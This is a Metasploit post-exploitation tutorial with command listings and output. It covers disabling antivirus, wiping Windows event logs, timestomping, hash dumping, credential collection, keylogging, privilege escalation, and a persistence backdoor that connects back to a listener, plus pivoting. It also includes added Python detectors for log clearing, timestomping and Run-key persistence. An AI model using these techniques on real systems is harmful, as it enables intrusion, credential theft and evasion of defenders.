
For breaking into the system, a vulnerability in some software is exploited and the payload (in this case the meterpreter) is executed in the memory space of the exploited process. As unexpected data is sent to the process during exploitation, the process might eventually crash and exit. If the process closes, our meterpreter shell will also be lost, as the memory space of the process is destroyed when it exits.

The first step after successful exploitation should be migrating our payload to another process's memory so that even if the exploited process crashes, the shell is still retained. To do this you can run ps to get a list of processes with their PIDs and then use the migrate command to move the payload into another process (Listing 1).

Killing monitoring software

Nowadays almost every system runs some kind of protection or antivirus product. On one hand they protect the victim from such attacks; on the other they are a hindrance to the attacker. To stay stealthy and perform all actions seamlessly, one should consider killing any monitoring or antivirus software on the victim once the meterpreter shell is obtained. Metasploit makes this easy by providing two important meterpreter scripts, getcountermeasure and killav.

Getcountermeasure tries to list all the protections present on the machine (Listing 2).

The killav script maintains a list of known antivirus process names. Running the script looks for any of these processes on the machine and kills them if present.

Listing 1. Migrate the payload to another process

meterpreter > ps

Process list
============

 PID  Name          Path
 ---  ----          ----
...snip...
 228  lsass.exe     C:\WINNT\system32\lsass.exe
 380  svchost.exe   C:\WINNT\system32\svchost.exe
 408  spoolsv.exe   C:\WINNT\system32\spoolsv.exe
 480  regsvc.exe    C:\WINNT\system32\regsvc.exe
 724  cmd.exe       C:\WINNT\System32\cmd.exe
 768  Explorer.exe  C:\WINNT\Explorer.exe
...snip...

meterpreter > migrate 768
[*] Migrating to 768...
[*] Migration completed successfully.

Listing 2. Listing the machine's protections

meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration:
[*]
[*] Operational mode = Disable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration:
[*]
[*] Operational mode = Disable
[*] Exception mode = Enable
...snip...

Figure 1. Windows event viewer logs have been cleared

EXPLOITING WITH METASPLOIT

meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off avira.exe...

Deleting Logs

Any activity on the system is logged by Windows, so the attack and all future activities will be recorded by the default logging service. No attacker wants to get caught or leave any track that can lead back to him, so clearing the system logs is a crucial step of a pentest. Logs should be cleared not only after all activities on the system are done but also as soon as the attacker gets into the system. This matters because there might be a cron job periodically uploading the system logs to some server, which could upload the logs containing your attack. The meterpreter script clearev does the work for us by clearing the system and user logs, as shown in Figure 1.

meterpreter > clearev
[*] Wiping 997 records from Application...
[*] Wiping 2045 records from System...
[*] Wiping 1 records from Security...
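From the defender's side, what clearev leaves behind is the record of the clearing itself: Windows writes a "log cleared" event (ID 1102 in the Security log on Vista and later, 517 on Windows 2000/XP/2003, and 104 in the System log naming whichever other log was cleared). The following Python is an added example, not part of the article, that runs that check over constructed event records and also flags all three logs being wiped within seconds of one another, which is what a single clearev run looks like; the record layout and the 30 second window are assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Event IDs Windows writes when a log is cleared (real values):
#   Security log -> 1102 on Vista and later, 517 on Windows 2000/XP/2003
#   System log   -> 104, whose event data names the log that was cleared
SECURITY_CLEARED = {1102, 517}
OTHER_CLEARED = {104}

@dataclass
class Event:
    log: str            # the log this record is stored in
    event_id: int
    time: datetime
    user: str = ""      # account shown in the event (assumed field)
    cleared: str = ""   # for 104 only: the log named in the event data

def clear_markers(events):
    """Return (time, user, cleared_log) for every 'log cleared' event, oldest first."""
    marks = []
    for e in events:
        if e.event_id in SECURITY_CLEARED:
            marks.append((e.time, e.user or "unknown", "Security"))
        elif e.event_id in OTHER_CLEARED and e.cleared:
            marks.append((e.time, e.user or "unknown", e.cleared))
    return sorted(marks)

def bulk_clear(events, window=timedelta(seconds=30)):
    """True when Application, System and Security were all cleared inside one
    short window: one tool run (clearev wipes all three back to back) rather
    than an administrator cleaning up a single log."""
    marks = clear_markers(events)
    for i, (t0, _, _) in enumerate(marks):
        wiped = {m[2] for m in marks[i:] if m[0] - t0 <= window}
        if {"Application", "System", "Security"} <= wiped:
            return True
    return False

# Constructed sample records (not real log data): a quiet host, then
# three clears a second apart, matching the clearev output above.
T = datetime(2010, 8, 21, 14, 2, 0)
SAMPLE = [
    Event("Security", 4624, T - timedelta(hours=5), "HACKBOX\\victim"),   # logon
    Event("System", 7036, T - timedelta(hours=2), "SYSTEM"),              # service state change
    Event("System", 104, T, "HACKBOX\\victim", cleared="Application"),
    Event("System", 104, T + timedelta(seconds=1), "HACKBOX\\victim", cleared="System"),
    Event("Security", 1102, T + timedelta(seconds=2), "HACKBOX\\victim"),
]

if __name__ == "__main__":
    for when, who, which in clear_markers(SAMPLE):
        print(f"{when:%Y-%m-%d %H:%M:%S}  {who} cleared the {which} log")
    print("bulk clear by one tool run:", bulk_clear(SAMPLE))
```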

Another way to detect an attack or malicious activity on the system is forensic analysis. Just by deleting the system and user logs one cannot be sure that the intrusion is completely stealthy. The forensic analyst usually checks for all files modified on the target after a certain date and time. This is done by reading the four date and time stamp attributes of a file, known as MACE.

MACE signifies Modified, Access, Changed and Entered into the master file table times of a file.

To remain undetected even under forensic analysis we have to take care with the activities done on the machine. The best way is to do everything in memory and not touch the file system, that is, not create or modify any file.

There might be cases where interacting with the file system is unavoidable. In such cases, timestomp, part of the priv meterpreter extension in Metasploit, comes in handy: it lets you read and change the MACE times of a file (Listing 3).

For example, after creating a file test.txt:

meterpreter > timestomp test.txt -z "Saturday 10/08/2005 2:02:02 PM"
meterpreter > timestomp test.txt -a "Saturday 10/08/2005 2:02:02 PM"
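The MACE discussion above is also where an analyst catches timestomp: NTFS keeps a second copy of the four timestamps in the $FILE_NAME attribute, which SetFileTime-style tools such as timestomp do not rewrite, and a value typed as in the -z and -a examples carries whole seconds while NTFS records 100 ns ticks. The Python below is an added example, not from the article, that applies both checks to constructed MFT-style records; the record layout, the file paths and the sample times are assumptions.

```python
from dataclasses import dataclass
from datetime import datetime

MACE = ("modified", "accessed", "changed", "created")

@dataclass
class MftEntry:
    """One MFT record reduced to its two timestamp sets (assumed layout)."""
    path: str
    si: dict   # $STANDARD_INFORMATION times: what SetFileTime/timestomp rewrites
    fn: dict   # $FILE_NAME times: only the kernel sets these, on create/rename/move

def stomp_indicators(entry):
    """Reasons this entry looks back-dated; an empty list means nothing odd."""
    reasons = []
    # 1) A file cannot be created before its own name record was written,
    #    so SI created earlier than FN created means SI was set by hand.
    if entry.si["created"] < entry.fn["created"]:
        reasons.append("SI created precedes FN created")
    # 2) Real writes land on arbitrary 100 ns ticks. Four SI times that all sit
    #    exactly on a second boundary are what a typed value such as
    #    "10/08/2005 2:02:02 PM" produces. Heuristic: files copied from FAT or
    #    unpacked from archives also carry coarse times, so review, don't convict.
    if all(entry.si[k].microsecond == 0 for k in MACE):
        reasons.append("all four SI times have zero sub-second part")
    return reasons

def scan(entries):
    """Map path -> indicator list for every entry with at least one indicator."""
    found = {}
    for e in entries:
        why = stomp_indicators(e)
        if why:
            found[e.path] = why
    return found

# Constructed sample records (not from a real MFT): an untouched file and one
# whose SI times were set to the article's "Saturday 10/08/2005 2:02:02 PM".
REAL = datetime(2010, 8, 21, 13, 55, 40, 123456)      # true creation, kept in $FILE_NAME
STOMPED = datetime(2005, 10, 8, 14, 2, 2)              # typed value, whole seconds
SAMPLE = [
    MftEntry(r"C:\Documents and Settings\victim\notes.txt",
             si={k: datetime(2010, 8, 20, 9, 30, 5, 418200) for k in MACE},
             fn={k: datetime(2010, 8, 20, 9, 30, 5, 418200) for k in MACE}),
    MftEntry(r"C:\WINNT\Temp\test.txt",
             si={k: STOMPED for k in MACE},
             fn={k: REAL for k in MACE}),
]

if __name__ == "__main__":
    for path, why in scan(SAMPLE).items():
        print(path, "->", "; ".join(why))
```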

Victim information gathering

Gathering as much information as possible about the system gives us a heads up and can help in later steps. Let's look at the different kinds of information that can be extracted and the way to get them.

Lots of modules and meterpreter scripts are available for gathering information, but we will discuss only a few important ones here. You can view the available meterpreter scripts by typing run and pressing tab twice at the meterpreter prompt.

Figure 2 lists the available run scripts on my installation of Metasploit.

meterpreter > run

• Check the user and the privilege level that we have broken in as.

Listing 3. Change the MACE times of the file

meterpreter > use priv
Loading extension priv...success.
meterpreter > timestomp -h

Usage: timestomp file_path OPTIONS

OPTIONS:

    -a   Set the "last accessed" time of the file
    -b   Set the MACE timestamps so that EnCase shows blanks
    -r   Set the MACE timestamps recursively on a directory
    -v   Display the UTC MACE values of the file
    -z   Set all four attributes (MACE) of the file

meterpreter > getuid

Server username: HACKBOX\victim

• Check whether the current user is active, or how long he has been away.

meterpreter > idletime

User has been idle for: 16 mins 5 secs

• See what the user is currently doing by taking a screenshot of the victim’s machine. An example screenshot of the victim is shown in Figure 3.

meterpreter > screenshot

Screenshot saved to: /home/msf/WiyDGJwX.jpeg

• Check if the exploited victim system is a real machine or a virtual machine.

meterpreter > run checkvm
[*] Checking if HACKBOX is a Virtual Machine
[*] This is a VMware Virtual Machine

• Get the list of most frequently run programs, which indicates the major use of the machine by the victim and may reveal some interesting information. The prefetchtool script reads the data from the Windows prefetch folder, which contains some basic information about the programs that are used regularly.

meterpreter > run prefetchtool

[*] No local copy of prefetch.exe, downloading from the internet...

• Dump the password hashes from the system, which can be fed into a hash cracking program to get the clear text passwords of all user accounts on the victim machine.

meterpreter > hashdump

or

meterpreter > run hashdump

Administrator:500:MYLMHASH:MYNTLMHASH:::

Guest:501:MYLMHASH:MYNTLMHASH:::

asdfds:502:MYLMHASH:MYNTLMHASH:::

Domain Admin?:1000:MYLMHASH:MYNTLMHASH:::

qwewqe:1104:MYLMHASH:MYNTLMHASH:::

DOMAINCONTROLLE$?:1001:MYLMHASH:MYNTLMHASH:::

• Collecting important or interesting files from the machine. This can be done by searching for content using a regular expression and then downloading it to the attacker's machine. Meterpreter has a search function that by default searches all drives of the victim's computer looking for files of choice.

meterpreter > search -h
Usage: search [-d dir] [-r recurse] -f pattern
Search for files.

OPTIONS:

    -d   The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
    -f   The file pattern glob to search for. (e.g. *secret*.doc?)
    -h   Help Banner.
    -r   Recursivly search sub directories. (Default: true)

Figure 2. Meterpreter shell showing run scripts

Figure 3. Screenshot of the victim

• To search for PDF files, run search with the -f option and the pattern to look for:

meterpreter > search -f *.pdf
Found 418 results...
...snip...
    c:\Documents and Settings\All Users\Documents\datasheet.pdf (28521 bytes)
    c:\Documents and Settings\victim\Documents\photo.pdf (71189 bytes)
...snip...

• Working with registry

The Windows registry holds a huge amount of information, and a slight change there can have big effects. Meterpreter provides a tool to read, write, create and delete registry keys and values on the victim machine (Listing 4).

Using the registry, one can find what files have been used, web sites visited in Internet Explorer, programs run, USB devices attached, and so on.

Listing 4. Read, Write, Create and Delete registry on victim’s machine

meterpreter > reg

Usage: reg [command] [options]

Interact with the target machine’s registry.

OPTIONS:

-d The data to store in the registry value.

-h Help menu.

-k The registry key path (E.g. HKLM\Software\Foo).

-t The registry value type (E.g. REG_SZ).

-v The registry value name (E.g. Stuff).

COMMANDS:

enumkey Enumerate the supplied registry key [-k <key>]

createkey Create the supplied registry key [-k <key>]

deletekey Delete the supplied registry key [-k <key>]

queryclass Queries the class of the supplied key [-k <key>]

setval Set a registry value [-k <key> -v <val> -d <data>]

deleteval Delete the supplied registry value [-k <key> -v <val>]

queryval Queries the data contents of a value [-k <key> -v <val>]

Listing 5. Stealing the user's tokens and passwords from browsers, email and ftp clients

meterpreter > run credcollect
[+] Collecting hashes...
    Extracted: Administrator:7584248b8d2c9f9eaad3b435b51404ee:186cb09181e2c2ecaac768c47c729904
    Extracted: asdfds:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: HelpAssistant:713c7f414ef1ddfd43ed3164e67b8d07:70b582319e3a4da8958b93141191d98b
    Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:b137dc9544f7afa9f6fe85d39bd6b29b
[+] Collecting tokens...
    HACKBOX\asdfds
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    NT AUTHORITY\ANONYMOUS LOGON

meterpreter > run enum_firefox
meterpreter > get_pidgin_creds

Listing 6. Get system privileges

meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h   Help Banner.
    -t   The technique to use. (Default to '0').
         0 : All techniques available
         1 : Service - Named Pipe Impersonation (In Memory/Admin)
         2 : Service - Named Pipe Impersonation (Dropper/Admin)
         3 : Service - Token Duplication (In Memory/Admin)
         4 : Exploit - KiTrap0D (In Memory/User)

meterpreter > getsystem
...got system (via technique 4).

Listing 7. Error due to a bug

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
HACKBOX\Administrator

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter > impersonate_token HACKBOX\\Administrator
[+] Delegation token available
[+] Successfully impersonated user HACKBOX\Administrator

Listing 8. Machine rebooted

meterpreter > run persistence -h
OPTIONS:
    -A   Automatically start a matching multi/handler to connect to the agent
    -U   Automatically start the agent when the User logs on
    -X   Automatically start the agent when the system boots
    -h   This help menu
    -i   The interval in seconds between each connection attempt
    -p   The port on the remote host where Metasploit is listening
    -r   The IP of the system running Metasploit listening for the connect back


Stealing information

Metasploit provides modules which help the attacker/pentester steal sensitive information from the victim. This includes stealing user tokens and passwords stored in browsers, email and ftp clients (Listing 5).

Privilege escalation

We have mentioned privilege, but let's try to understand what it is exactly. Suppose you have to perform an action on a machine; it will be associated with permissions. If you have the permissions to perform the action, it executes successfully; otherwise the action is blocked. Privilege defines the permissions to perform actions associated with a user on the system. SYSTEM is the highest privilege user on a machine. In certain situations you will find yourself broken in as a low privilege user, which limits the actions you can perform on the remote system, such as dumping passwords, manipulating the registry, installing backdoors, etc.

Fortunately, Metasploit provides a few techniques by which you can try to elevate your privilege level to SYSTEM. Some of them are:

• Using getsystem that tries a set of ways to get system privileges as mentioned below (Listing 6)

• Impersonating tokens

Note: When using impersonate_token use two backslashes (\\), as with one it causes an error due to a bug (Listing 7).

• Migrating to high privilege process

Using the technique discussed before to migrate to another process, we can try to migrate to a process that runs with SYSTEM privileges. On successful migration to such a process, privilege escalation is achieved.

Backdooring or installation of rootkits

Once broken into a machine, you might want to maintain access for further examination or penetration into other machines on the network. In scenarios where one cannot exploit the same software or service again, it ensures that you can still regain control of the machine. If you want to close the current connection, for instance when you want to switch off your machine or remove it from the network, you are still able to reconnect to the machine without actually exploiting it again.

Listing 9. Connect back

meterpreter > run persistence -U -i 5 -p 3333 -r 192.168.1.11
[*] Creating a persistent agent: LHOST=192.168.1.11 LPORT=3333 (interval=5 onboot=true)
[*] Persistent agent script is 613976 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\yyPSPPEn.vbs
[*] Agent executed with PID 492
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/HACKBOX_20100821.2602/clean_up__20100821.2602.rc

Listing 10. Edit the source or filter out the connections on the port

meterpreter > run metsvc -h
[*]
OPTIONS:
    -A   Automatically start a matching multi/handler to connect to the service
    -h   This help menu
    -r   Uninstall an existing Meterpreter service (files must be deleted manually)

meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
[*]      * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

Keylogging

A well-written tool in Metasploit allows you to log all the keystrokes on the system without writing anything to disk, which makes it a lot stealthier than other keyloggers. Every system has a keyboard buffer holding the key presses consumed by the OS. This tool reads that buffer and dumps it to the attacker, so there is no need to write the key presses to disk before sending them, and it leaves no trail for the forensic analyst. This is quite useful for acquiring usernames, passwords and other sensitive information.

As all GUI user interaction happens in Explorer, in order to keylog we migrate to the explorer.exe process:

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...

gmail.com myusername notmypassword

The icing on the cake is that you can even capture the login information of users on the machine. To do that, migrate to the winlogon process and start the keyscan. This will log the credentials of all users who log in to this machine.

Persistence

To be able to get back to a system that was exploited before, even when the vulnerable service is down, use the persistence meterpreter script. This creates a meterpreter service which is available even after the remote machine is rebooted (Listing 8).

Configure the persistent Meterpreter session to wait until a user logs on to the remote system and try to connect back to our listener every 5 seconds at IP address 192.168.1.11 on port 3333 (Listing 9).

As soon as a user logs into the system, if you have a handler running, you get a meterpreter session. To uninstall the service you can run the .rc script shown in the last line of the output. Please note that this backdoor is very noisy: after the user logs in it keeps trying to connect back to the listener every 5 seconds. Also, it requires no authentication, so anyone who runs a listener with the same configuration will get a meterpreter session on the victim.
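Listing 9 also shows what the persistence script leaves for a defender to find: a .vbs under C:\WINDOWS\TEMP and a randomly named value under HKCU\...\Run. The Python below is an added example, not from the article, that triages autorun entries for exactly those traits; the entry tuples, the Run value's command line and the entropy and case-flip thresholds are assumptions, not the script's own behaviour.

```python
import math
import re
from collections import Counter

# Autorun locations the persistence script writes to (HKCU\...\Run in Listing 9).
RUN_SUFFIXES = (r"software\microsoft\windows\currentversion\run",
                r"software\microsoft\windows\currentversion\runonce")
TEMP_DIR = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
SCRIPT_HOST = re.compile(r"\b(wscript|cscript|mshta)(\.exe)?\b", re.IGNORECASE)
SCRIPT_EXT = re.compile(r"\.(vbs|js|hta)\b", re.IGNORECASE)

def entropy(s):
    """Shannon entropy of the string in bits per character."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def looks_random(name):
    """Heuristic for generated value names like YeYHdlEDygViABr: long, letters and
    digits only, high entropy, and upper/lower case flipping between neighbouring
    characters far more often than in a product name (thresholds are assumptions)."""
    if len(name) < 8 or not name.isalnum():
        return False
    flips = sum(a.isupper() != b.isupper() for a, b in zip(name, name[1:]))
    return entropy(name) > 3.3 and flips / (len(name) - 1) > 0.5

def triage(entries):
    """entries: (key, value_name, command) tuples as a registry export gives them.
    Returns (key, value_name, command, reasons) for the suspicious ones."""
    hits = []
    for key, name, cmd in entries:
        if not key.lower().endswith(RUN_SUFFIXES):
            continue
        why = []
        if TEMP_DIR.search(cmd):
            why.append("runs from a temp directory")
        if SCRIPT_HOST.search(cmd) or SCRIPT_EXT.search(cmd):
            why.append("launches a script rather than a program")
        if looks_random(name):
            why.append("random-looking value name")
        if why:
            hits.append((key, name, cmd, why))
    return hits

# Constructed sample (not a real export): the entry from Listing 9, whose value
# data is assumed to be the dropped .vbs path, beside two ordinary entries.
SAMPLE = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "YeYHdlEDygViABr",
     r"C:\WINDOWS\TEMP\yyPSPPEn.vbs"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SunJavaUpdateSched",
     r'"C:\Program Files\Java\jre6\bin\jusched.exe"'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "ctfmon.exe",
     r"C:\WINNT\system32\ctfmon.exe"),
]

if __name__ == "__main__":
    for key, name, cmd, why in triage(SAMPLE):
        print(f"{key}\\{name} = {cmd}\n    " + "; ".join(why))
```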

MetSvc

Similar to persistence, metsvc, written by Alexander Sotirov, is also a backdoor that allows getting a meterpreter session at any time without exploitation. Metsvc installs a service on the victim machine that opens a port and listens there for requests.

The attacker can connect to the port and get a meterpreter session without any authentication. Therefore it's not safe to keep this backdoor open forever, as anyone who can connect to this port can get a session. In real world scenarios, you could either edit the source to add authentication or filter the connections on the port to allow only the attacker to connect (Listing 10).

Victim pivoting

Pivoting is the technique of using a compromised instance to "move" around inside a network: basically using the first compromised system to allow, and even aid, the compromise of other otherwise inaccessible systems.

To understand this better, let's take an example where you have compromised a system that is connected to another network not accessible to the attacker. The layout of the network is shown in Figure 4.

• Attacker: IP – 192.168.1.132

• Victim1: IP – 192.168.1.131, 2nd IP – 192.168.15.3

• Victim2: IP – 192.168.15.32 (not accessible by attacker)

After breaking into victim1 and using the meterpreter session to run the ipconfig command, we see that victim1 is connected to two different networks. We will use this new information to attack the additional network. Metasploit includes an autoroute meterpreter script that allows the pentester to attack this new network through victim1 (Listing 11).

Figure 4. Layout of a test network

On successful addition of the route you can scan the new network for other systems. After the scan you can launch an attack on the new system (victim2) just like the attack on victim1. All the attack data will be routed through victim1 over the route added by the autoroute script. On successful exploitation of victim2 we will have a meterpreter session via the existing meterpreter session of victim1.

This demonstrates that pivoting is an extremely powerful feature of Metasploit that lets you exploit systems which are normally not accessible to the attacker. It is one feature every pentester should know about and have experience using.

Conclusion

We saw that post exploitation lets us do much more, and extract far more information about the victim, than just running a payload with the exploit.

Post exploitation not only helps in gathering more information about the victim but also helps in digging further into the network by using the victim as a gateway to other subnets. On an ending note I would say that post exploitation is as important as, or maybe more important than, breaking into the system.

HARSIMRAN WALIA

Harsimran Walia is a research scientist at McAfee Labs. He graduated with a degree in mechanical engineering from the Indian Institute of Technology, Delhi. Harsimran presented his research at India's biggest international hacking conference, NullCon, in 2011 and gave a talk on "Android Security" at c0c0n 2012, a cyber security and policing conference. He specialises in the fields of offensive Metasploit, reverse engineering and malware analysis. He is also the author of various research papers.
